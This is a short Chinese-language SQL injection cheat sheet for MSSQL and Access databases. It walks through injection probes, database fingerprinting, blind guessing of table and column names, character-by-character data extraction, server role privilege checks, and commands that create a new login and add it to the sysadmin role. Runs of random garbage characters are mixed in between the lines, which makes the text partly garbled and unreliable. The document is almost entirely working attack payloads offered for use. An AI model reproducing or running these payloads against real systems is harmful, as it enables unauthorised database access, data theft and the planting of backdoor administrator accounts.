1.判断是否有注入;and 1=1 ;and 1=2 P3V}cGZ
2.初步判断是否是mssql ;and user>0 p\M\mK
y?{YQ)fj
3.注入参数是字符'and [查询条件] and ''=' 5[$jrG\!
q=cH ^`<.
4.搜索时没过滤参数的'and [查询条件] and '%25'=' '>r"+X^W
M \3Zj(E/
5.判断数据库系统 XJi^gT N
@0q*50
;and (select count(*) from sysobjects)>0 mssql Toc="F`SW
W>`#`u
;and (select count(*) from msysobjects)>0 access 6o]X.plr
B!z5P"C(~
}4"T#
[n#
CT#N9
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ~UV$(5&-
e5fzV.' 5
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 $9O%,U@
lDhuL;9e
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 }K\m.+%=d
< 5#}EiT5
9.(1)猜字段的ascii值(access) { Sn
J
HCKj8-*
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Oe}6jcb6&
<3c|S_|L*m
(2)猜字段的ascii值(mssql) k/V:QdD Sb
2u'h,on?
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 "WHt9 yZ
4';(\42
10.测试权限结构(mssql) bO?Us
4
g^oy^~
}z8HS<
#Q
`=cOTn52
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 9dD;Z$x&Xk
-dsE9)&8DX
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ]AzDkKj
uPtS.j=
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- F^|4nBd*ub
6)~J5Fb
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 2s:$4]K D
}N<> z
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- G8_|w6
xu7Q^F#u
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- S?Z"){
5 MD=o7O^
;and 1=(select IS_MEMBER('db_owner'));-- p-o!K\o-1
x(/{]$h
iSxuor^;
%t\~3pw=
11.添加mssql和系统的帐户 p8Wik<'^
|v%xOl
;exec master.dbo.sp_addlogin username;-- o>Jr6:D(
;exec master.dbo.sp_password null,username,password;-- EAM2t|MG.
YX:[],FP
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- !o&